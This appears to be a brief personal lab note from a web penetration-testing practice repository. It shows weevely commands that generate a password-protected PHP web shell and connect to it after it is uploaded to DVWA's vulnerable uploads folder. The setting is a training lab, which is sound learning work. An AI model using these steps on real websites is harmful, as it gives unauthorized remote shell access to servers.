i-am-hacker-now/web-pen-test/README.txt

 > weevely generate [password] [path]/[file_name].php

-Upload file to target, it can see uploaded URI/URL in page because it is lab page.
+"Upload file to target, it can see uploaded URI/URL in page because it is lab page."

 > weevely [target_address]/dvwa/hackable/uploads/[file_name].php [password]